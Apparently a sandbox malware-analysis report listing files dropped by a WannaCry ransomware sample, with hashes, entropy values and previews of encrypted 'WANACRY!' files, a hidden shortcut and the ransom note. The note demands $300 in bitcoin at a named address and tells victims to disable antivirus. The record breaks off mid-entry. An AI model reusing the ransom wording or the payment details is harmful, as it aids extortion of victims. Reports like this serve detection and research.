                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.809823740207784
                                Encrypted:false
                                SSDEEP:24:d/0XDribk6VH7RnvQKduSCYnrr4B0JTLDTZkPMLUxEyOpIz2G81L4j:iT+tFopK4YTGMgxIpQoQ
                                MD5:A52628A59EA347A54B21CA923D0FBFD7
                                SHA1:40F9C8382A35A4E43A661B2F7DB3A0CB48146293
                                SHA-256:E0F23E1E08B72EA7FCE676DC3783CF78C29C599E8F844704522E4807507BE3DB
                                SHA-512:D43704526B44C52F25706A569127F073D7055ED9DC163C114B8E98B251FCB3E305AF0B90FEE39184C909F0DE4287C5B1E83BAF36C0A3D4B6D515C70B5374E77E
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839711662801909
                                Encrypted:false
                                SSDEEP:24:bk3On3cfgjRStSO6FZKJYM+JGRgl8x54n7XdYLOs8f5SuVubQKq765jY0bQqqEAd:bken30gueFc2MHSl8x5A7kAIuVaQKQ6q
                                MD5:C911F65DDCD2C34239A9252C0428DD67
                                SHA1:DBD1D3BFC5CDDBCD354F0A27BE4DD67B27735583
                                SHA-256:8B7310E1763C2122B81841D4A997893E7D602DA4A79925C9812D86FAF809E4CD
                                SHA-512:7226E74768A0A6921A1D9CB4D4360368C900331C3210C6BD57506CF56E86D28E312A6454DC511D192A4DA25534A7F9D5006E0856E8B80CC993A59879BFDD5552
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.823236884267783
                                Encrypted:false
                                SSDEEP:24:gzUnrM1bUIHYndit0DrQOArGWD7trMMwZbfOc2MSBC2ugH6hOi3oa:g4rM1bNKQtqr46k7yfZbfOc558q9
                                MD5:4EF7035955F13ECF7C0C2A3451C01E91
                                SHA1:5E6DDFA177EEB10C0AF3B8EFE7A23B7E2C4FFE9A
                                SHA-256:F2525F0C7697DEC16A532C319E282471A97944A6C74132B0907E74A1AED22342
                                SHA-512:292061F65DFE9BD8785134094A527327E4BD81C174C241C4A4E7CBCB1C49C4F629CD58F6DD7872F6F400ADBCEAD0307C2406C3A0D29C2952159B198E302B50EF
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846599426002445
                                Encrypted:false
                                SSDEEP:24:bk+/whbrmnvTULexz/dM/VFLJLtOLwr5ZSGatqE6DyGqzrk2010lwUU/zhXeS4:bkIAmvTUqz/dM/dLAw3jatqE6uDzo2gM
                                MD5:FB120DDBA971C0447F30B49846328258
                                SHA1:968E4BC6D8EB1681E00F9E29E8A0BF84ECBAE997
                                SHA-256:2142B5513B7904294FE806DBA4A95143C58E6311C2DA16F0D0C46B0C9E42BF25
                                SHA-512:B6CDEB19901E204A089333D93AFB648F8EC99E26AB4181A57DE10CE4364228126559B261BBB84E6A75EF6C198EE03AB34E60EF55F1F1B5E6AC427B63C7BB93F7
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.804780018876966
                                Encrypted:false
                                SSDEEP:24:9D31lcqYi/49DE8dppMbsuONsnbj2INWhuUWn8dLuV40pPArA/5G1:tXYm4DVMbDu0uCdf8dLDyA+0
                                MD5:C231839DC1C5CE1D32565E2FFEAC4FD8
                                SHA1:8A99C026BAD317D1FE7CDC4F9E1EB8EB4C7EBD67
                                SHA-256:560DEE3466145A22C6F1C42878E64BBE48FDB0A1465EA73AF2704ADDC307B780
                                SHA-512:87ACD03D5A43AEFEE06654E7F3A01E8BEFABE4C4CD3720E959B6E52A8B17656B9A8D958DD4BA1B25FD6971345C4B6B3443ED14CCA76C443CC71F1BC31A0C8FF6
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84142502792671
                                Encrypted:false
                                SSDEEP:24:bkMl3CfUotsQO4+KxuvRV8isxktI2M2Sm18wiOy3eskeJTHWd4U/z5NW/iJOaxei:bkK3cUvQObKxaVAkO2MHmDeb3JH6lNuW
                                MD5:09602DD7B3EB4662F44B728AB9C27C62
                                SHA1:A5C8CDED88DFB8E34596F810A18E016234E51F45
                                SHA-256:D7E01A3CF53C6932A4C7F97931E507A788FEB8A10FB0167452D8D7F7EB40357C
                                SHA-512:03EA3CB43BA91466EEA7DA7A6FEE0D2FC76D637019078B3151735764D44D183E46516E02A22D9F62D4C2B6C0BA673A888ECD2D8FD0EF52620F419406C3EF78EC
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.808499372351159
                                Encrypted:false
                                SSDEEP:24:4A2tf8Kfb4rT01v6RinnoLHwXMCgPNqOKVw:1W34rT01v6SiHKMtPNqOp
                                MD5:E8BE837A28138A93595B8A56E959F0B6
                                SHA1:86FAD0D7F15BE9024D32A6A2B2143C18E61275AF
                                SHA-256:78960E67EE8F3F3C39B8CFBE165B14F8AB36CCB4C36BF50CA6658879DD2450CA
                                SHA-512:542613F56A999C5DBC0754BEF11AB92C1CDE7AB2BCE5EF0EB2D8BBFD59A11E5841C5ECC811B1B8458C75CE4770C1B5327769C1F9DACE3A4C910CCD338903B9DE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846628120539456
                                Encrypted:false
                                SSDEEP:24:bk0x1ZcUjQB+Cc9RkrVWAd38Sc3XhHWapGm/0IYKJvtsgpU3Qc5WaqxB1HVyOC28:bk6ZcUdCIRkrVW6iBHPp5zYKbsgpElzv
                                MD5:3325B106A0C5675F205DA5F0A44B57EC
                                SHA1:D0E63863AF7503A19DE044D3824A0C227EFEB61E
                                SHA-256:389A6597734B76AA4AB0443650B81768D6F90FB28D4BCC2D11519AF08C93136D
                                SHA-512:55172FCAC87AFD1D56036256F4F98B72EA4171934618E46B1B9DE335E03DA5C1C97289252F12C12E583E655B9476EAC9BCA35A03B81C66F7D8350CF318BEFDA8
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.806888303472629
                                Encrypted:false
                                SSDEEP:24:+gEtsguX5Q5pU3TtR5sPXUAGpgjnsxAE4A3fmEJUjA:StwQUzAUrSCAS3OeUM
                                MD5:37C12504FA4DC2380DF151BCC7C0FD83
                                SHA1:8B5B911BC075F910B5568E5B93B76A7BDD4A4CCE
                                SHA-256:979D3A15204450A33D720CC06E30C09F83D5A76BEC9B8975EFF0400368B367A5
                                SHA-512:212F20762CC43363DE0541A23F698C008DADC46C934F59432CA2605233D06B2102C6F1969401F624E2968E0E9E7AD5EA5143893DB1596B292C23F8CDE3F45211
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8407132698693625
                                Encrypted:false
                                SSDEEP:24:bkUuSUWtFZHXWPKEbLXmmujZw2yBKlY5NIsRdJgiaDKWl3PUZzvqc:bkWtTWLXmmuWWlsI7/VPURic
                                MD5:BE8FC703CF3C19E386FAB226FC9DA4CA
                                SHA1:10025B4FFD2D0AE70DAB9885F959A71891C67A58
                                SHA-256:752B060489375748A7385B224B0F9C06F695269642AE8D4AB84A4D28681C5563
                                SHA-512:FD44203447CB9613C3405CD25B3375EEF465ACDFAE87046B4C18CB996D0FBA7743E3534086761939955C558B66411CC1538C3CDB1B15D34B7791970670EC6BE4
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7890687824907205
                                Encrypted:false
                                SSDEEP:24:ClEYDtc3FsjP0ognDgAxuIRvgnthzfZgaBciLY0HHcQaFhaV:hYwEVIRq3f9jyIV
                                MD5:F7343BD5F29B8C58BCFF3E614D4D38D9
                                SHA1:829D7981456455E37F4655D40DA21351FF4F9DEB
                                SHA-256:ACB3AC32CCD3A9A8BBCCE408C0A2872647A30619FBF74CFF08526F35BC16A3D3
                                SHA-512:9167C3A6C071AA543FFC3002CB370D9595E96C648742707CEC192F6174FE09715AB9E118D6FCA6B3B7F9EB7536783B60ACD4E6AB9376FDBFDD1409AA1400D719
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832594248516997
                                Encrypted:false
                                SSDEEP:24:bkXhREAdfUiWNexUDsJ5pRd5he+/A/EE9VRV3cSn13iZpvKsZLtX/eo3aaA4d:bkXhR3cgJ3RdyAKXMSEnvV7Xmo3aahd
                                MD5:0C99AC97352908500DE12D83514C919F
                                SHA1:EAC8E50E58FFCA4EE5CE42E19FDD5DD7A9385E95
                                SHA-256:6C2B084A335F20CB4E47AD83C2783EA49255ED070AB2DCFF29F0C3800BB90077
                                SHA-512:3247A37001709D74E7D2CF864C4393E79C8994C8E70595CB8D042C6F027C564C42F848A88C1C7C3B95741594D07F32B3E412FA34DE8E81ADC32917AA8D804DA7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........7...>}&.^.dW.8...U_9...~j...I..Zb..5.<C.+.|l....r.c.....i.=2..t.po.i..d.< ..qu.W....0.n.W.4...W}..[*......6+-....6z......C9.>.q.M.fc...h[\@...1..!...S..5.oL.......x2V.plu....~~je...k..[....L..k..#.R'*.../.......B...1]....9.....{.R..... ..............Bu{.~..2d...s....R=.X.G.n.e..q.R.....7...*Q...Mz!..B.].....O/.....H.... ..;..?[h...}OF...0M........}..O".Vh/....s.n{...iz.U_]...?.;....kD.._..)R)9..+7.P.....6S_.....M$..nr....t..t!..U.2-.l...4...K.Y~..k."i`.Q.....@....e.1.........gU...n,.._.......1........4..k.CS...Z.. ....V.....r......!.s.y.A_5.............A....N=......igH.k$..>...~..........t.w.s.n....R.....V.&..x......3..z.)..pm........v.....6.x.)%t.`.....#".=..>).0..b.VZ...g.....\J....R.Q.MI~...G..?.....).j..5....?.p..L.(O9...G.k.E.OQ..B.HU.O#T~..f......\.e^..K]iI...f.X...>R....w.{mb.T.4`.la...s.......F.6.?..S+P..:P.\)GEn..*.(e...yyy.......}/..O......1Y.O..&xqkqtx).$..yA...~XN..A...U..V.9.Z.8..e...Z.....M.$........1:....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7940896377629585
                                Encrypted:false
                                SSDEEP:24:m7SPT5fkKUtBHjchWPWNLy6x6sssa9GrYZvdtbuKPmWZZt5:LFkVJjchWSLPx6si95tbxP3Zn
                                MD5:B52BB4FDED782165CC64A78AD3A3DE1C
                                SHA1:5B5BFA1FC4C7FC6A7B63C4941F840F173094A71E
                                SHA-256:9C0B5EFE02A9CF581A0051685FCBE6A534F09842F7EFB180B9FD045B4D586404
                                SHA-512:9ED91EE47396989449148717F8E8E12C7B025E94C6D7CE6E31F92B8163EBD4551F67035FF2372152692ED1FFDE85B8723226F712ED66C4C242ABB74CC484C20F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.866357970534479
                                Encrypted:false
                                SSDEEP:24:bkVPd+5neiakaV6eNed+NERZQSXDZmGvATc4D1kXkVcw33b65d:bkhInetWd+MZ9TrvA4yVD3Lmd
                                MD5:35C7407FF48B2033104450BDF9E181F6
                                SHA1:A07D7EBFFC4B6BDE79D30D53CC45E4F4DA81E6BF
                                SHA-256:6844D88102015E25467C1F4A4C8278243E1D0C36357ECAD92118729D07299D9B
                                SHA-512:48BF329A1C6E872A7E4F72376A32FF8957BA586C13F4178666811AF41F150D56001EDDBB74190A82E53349EFB6CF0D1BD935441169070EDA1F7B5C5F3D5A9041
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....c.z...5.AO`..i...s...c...:V..u}:$....Z.D.#.S~z.w|.J.\.....T..........9....8.m/.....[.k7).Rx...|k:V.._....f....W........?.o...W..+V..T..ph..h........A.:..3W....D+2.q.2w..vW..qU..........W.xx<......NL....Oi....<=...>1.`.....1!.O..%.....q..#.l...............3U@+.$..%'=1..[...Z.S.....c;h`.S..-..,...........g.(.l{?#.m%../.._./.>.IgbWR.......3r.m......+.G(..MB...O.\..K...c._WN9@......V)....{....a..6..|..Y.}.[T.)...}.&f}.p......"...:./...t...........f.A....l6iQ..>)..I...Y.-...}.F-z.v...f.....b.:6..t.N.S....O..#..5N....._..]...80Xp...Uq..*_.(.U.=\.l.yp_.....(F/.C.O...T!$.DTD..Q.@s2..J...7...KO..MSZp..<B. H.n..+3...k!.k.&+.E..Z.Es...X.@]....51.=.M.....W......t...z.lY1.&...u....'..2'..=} ..zj....N.._y4.=.Ci......v......tF.v.".....(....v.c(.D.*...+...._8...C..1{..'q..[`.......f.....V..)t.j..V../M..-.?......e.4..K7........t..Nnb.x...J.GPLw..f...r.#........z.E..P9.q.8. &..G5B,.(.\....i.9..a...T.>.....u...u.....P.A.F..Oh...`...._!E.....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.822754322988812
                                Encrypted:false
                                SSDEEP:24:0nfVXGNl54fCDKx/mEbdx+01otNOlSeugvvXrEo5J1EgHjU:g9GNUfAAmEfi3euwrF3FjU
                                MD5:36466F0FA0120C2105B14A413842D3A3
                                SHA1:D7F2DDEF5385C4FF50012063761809EC17DF7AC4
                                SHA-256:AE8F6B606CCFAF1639FE090B0B1CF08455F26276A2DE37234D7CC693D2770404
                                SHA-512:CE474408CE2B3F134147FD07B525819DD868F54071CB50A968B5EEDC9AB3E0AFA5AAB5F882E1EA3DDDA3C891B53132F9D46C27AEEA9F002CC4621765B7E2DDB0
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853473127157515
                                Encrypted:false
                                SSDEEP:24:bk+5xAeXlTkpDrQIW5Thj7uPy0Ytr9GeFva1N9oSgpKpaux9AMmmeS/7w+aZ5tRE:bk+5CelQdRaThj7uq0YXGiva1fzyKpac
                                MD5:D827B86C81584B5C851D686E6647589C
                                SHA1:33EAC23B8A9AD9BB85B902304DE401ADD42BDC61
                                SHA-256:C1D51CC3BA9E343B24127D784585EF2E432EAB9EC5C49535508BF95B62B76948
                                SHA-512:4F9190E9DC05B3F8489E5F9192A866DBFD7F5347A99FB2AD325D76BE7D9DEB61D709C06D578A7E62691F3A74C95CF1653E49BAC971828DD1911D4556F6126585
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........4....S.T.[5V....k.T_./.d.x..1.n........'.@WD...c#....W"].N?-......Lq.+.........R.3-..../c?.dt..zz....O...Pb.9P..."..)5.q...C.<.... .U.<.8.J.a....K....n.vR........n..|......%.6...[.....mg.O.....?).*.xT....+c......Q#....cO,.\..(hf.,..D..jw.K............{|...c..!x.g.....@M.[)......../p.....=....j.h..{.;..b. ..,\..*Z.W..N1B..5.. D.......>.=....6h....xw..#P..3&.c........v.E..&,.2CwY..L.S*\..fy..2Qk........K".._..G..@...{........`..lv.....$A.I.*u.....q#.lv.8...6F... .t..._...4.N2..^Q~jV..|.u,P.x.<....P.kc}..~O.W....WQ.:P..}.e...!....0.!x\.H3..{w.z.F.i.r...?_9.<....X;..|6.O.,.....I..p?..>.s..[....8@I...t.t.)3y....p.j.u ....kdb....R3hL\..........3(?}.)#.f.O..C*z0..1H...gop.J!.~.. .{\K-q.._.~.|.>X1........;..B`JVc..b....)...Y.h.)U.K(G^.....^.z.DbrnQ.,v..i...aN3........e;.........iAC.D.&./....[.5....l[.b...hs.J<........9...l.+,..<..8..o4...........Ta.h...2...;.d'.W.v.w+.j.......i.l*r..@@.$W.H.[... (.V..d.......C..E...z.x.b..
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.79990850733804
                                Encrypted:false
                                SSDEEP:12:fOli7oYF+J9k3/EeO4Ux92VgqIkD/DNKHTfUrtT//O/ifk99p9kCnWpPWNblYO9X:vgJUUx92V9x7NYfUr5E9LxnIPO+cogLP
                                MD5:14D3AD8D0532D8AD5A9CD3EF40D19859
                                SHA1:4B6180A428665011F6DBFBAA6879744FBEF3C62A
                                SHA-256:B4510AC19BB462F42F262C7F242291C47E6A953340DC886DD2B55D08AF6C928C
                                SHA-512:A13E313051DA3D8CD3D84C9114127BDD730A6702C3430D1ABBAD79B37CF7C358979FD33A89FFF4D5F48CDF05A5310CE0FFBDF50F6C00AD3AD32E654284BAFF42
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843799295141846
                                Encrypted:false
                                SSDEEP:24:bkRXx+L8gHM25zoCFWSB15pCC+k+eXIOmL24MKTujDayP0Mo4jhb9:bkRhEX57FRnmC+kBXIOQN4ay8yVR
                                MD5:D7E53D0AE1F9854CD21BF18F8045DA00
                                SHA1:A64FD086D79CB1FA56138D132E9F59C6E1EA2F48
                                SHA-256:B4B07CF1D1AF2A6DA954180D33C31420ABAC5B70FA6301E4FFD33519FFE6AB27
                                SHA-512:38DFE8349ADB39D3BC0A82FDCEB7CD57EA12A058CA88E32A1C93248FDD31D62B11F612791048181A0EE3B7797BA68F6D66D53CD2861C1C609F4CE5700F02CDAB
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....beM....}.M..a....iu.L.K.*NLi.1.Y.p.^........h]..c...t..........x.h..;a\.....:*.l..:..b...L..~...h:..zO.<{YCK.|..H.`$..s.<....".`d*.....@KAc..g...\A......(.2.....f.....E|.Q..V......h..7u..K..S....f...f.../...d..]j....h.,Y..h.(.U.%..z D.....(O............%......t..W...`.:.z..yQs/V.....*.a..}...T..xN...[RF.,.L<@......j.l..x.B.fS..U.....#i.{*..v....9.j;.....D..(.$m.\PN..~.F.wQ*.~.iT....n.. .).... .......&Ex..Z(hPz...=)f..S=.....QY...{m.......ZJsU..../...%>(....CuiJ...I..?9..q=q..|+.A.+}.7..i.".....S...y^..q2Q.O..x..ky.R...]E.)Y....F.mg....a.......D...C..@I..h.(..#w.-k ..lB....17H..S. X?..(...LxsZ.OSV<o|.(;n.'..Q....y..........T..Z..a|J.....L..[;...(.FZn._b......\`.a~..f..-O.:.9..o...R......@..!...........t.........i!U.7}...p.C....T...._[..a..>C..w.z.C.5OvC.a...2...0.)....PO.r...."..1.M.Y.!?...0..Q....2......;k..>.C.t.g....;.b=.M...#... Y.r1.q3O\..g.>yx.2\$.0....-O(......Gz..m.....*$.....7nUlH..$0.lQ)...o.....5=u.P.....1..g..Z.~.
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.812510169906532
                                Encrypted:false
                                SSDEEP:24:iZNp63WGf00vopI0xqXho3jlNNyiAqwmEz1U69j6KKhtwc5pGTfFnKl:mmA06I0QhozFyi8mcKhiciY
                                MD5:2CAE604FC32C0B3BEA46A3D93E6B7563
                                SHA1:472DEE997DEE4E91646AD395194C3BE7702B0C84
                                SHA-256:551F003F0163425459367E6EAEF6CACDDACCB881A7F5A006450C4CB3D4956814
                                SHA-512:56BE5B0BEA246170D7FAF6FC8607A4D1399FFA0E0A39B0BEB871F43235C8D5FBFBA2C080590DBDF2661ABD2E85DA91FDECECDA4276073177FB249081E1520105
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852053691475159
                                Encrypted:false
                                SSDEEP:24:bkJNLNfS2JZ2/0pCqM57sKdXMDClmUS3aEv8PWS+qqUwII9ZpF7pQx5DSI:bkTNqiZ2aC/57sY0CoUS3euSxqfIIRQt
                                MD5:639441D30692A96CE86EE5A4DF90D0D2
                                SHA1:0784C7E8EF1AF9FBED1634B2337DDC5F46B16D3C
                                SHA-256:D96D242E60ABCC88E6DB83E0A724C8F88629FAF5B270D43A933775B14A3A6FEE
                                SHA-512:EA4D0408BDA7CBA9E962AB457F00E388CAAE2B1147E0B8C0279E78AA0BF4EA208DD42FCBFD9F9DE85156C3A72C2B00E579910F4AFA89CF02097C2F429B862617
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....]..R...l..i.:WJ?.g...G..].%v...0..6_.t;f....R.<...m+~I.Y.~gc#L..".H(.B=. .R..].M:..&.3^../.7.9Fzx.L....uxs.@?...>)L.s.#..|....^3e.z.....5.S*.&..LG8R.l.k7F.4...`.1|..T.g.b.dC.B..f...W..nl}...(P...47.....`..mJ.,..`fc..Z..~..>....Kl..3.....Az.6.g5..............h.7Ha`.Y....j..3....Xe.V.4K...x...@r`.>.-.Q.........-.{.8.B`...."..1.f.M.+....F.@xx.0.nq.-L.1.x...<...A}...H~F.8.5VNts.(n.s...9.#..........|..X......s.Z...8-..zq@.jxD.0C...4...Hl.......~...wL.e.~......9..J..tu....$..i..<......T......V.8n..`.u!B...)z....7W..8.T.P.%.........D.6...=bi....#b...1.....zp..........>..z.....I.F..i,...k...\+V../L.L........^.%4>....U..y....S&...C....l$."_{.'.....!!.yO.".ze.......8a....Bt.i.....m1t..8..Hb3O.X...ZN}:....).<.........Kk...%.^.`....^..h.b.Z.=z.........`.B..M..A.7...N...3......;.....7J....'...P...5........F...^x.i....!....%.C.\....l..8J{....R....d?...a.\X.........$...Z...-g^.D...w\._...b1<#..T/./.s-....}..AF.fYm..{.-BC...fg...
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820779399481449
                                Encrypted:false
                                SSDEEP:24:gXj0xvUBbzYZXcxMN4e1GW6Ly1Fo4Jc/59OT2zGeXo:0G8XCsiGe1GWvFn459OTwXo
                                MD5:40C34DD28D81C72CD473D8DD3830E709
                                SHA1:DB1223BC6071DF290993F449C2C78BFB894FB0A1
                                SHA-256:B0959ED55C1291282EE4DE0F9447DD0882E6CF7AB5134E2D2690A90D116E9486
                                SHA-512:03B73A8BE5E816BB5F68936A323F32C5A53AB7FB3D572879056EE9F7C0D0104746C280B232BC9403BBDB47A5141CA54B5658848048E44F25B964D99457DCE733
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.873070307496728
                                Encrypted:false
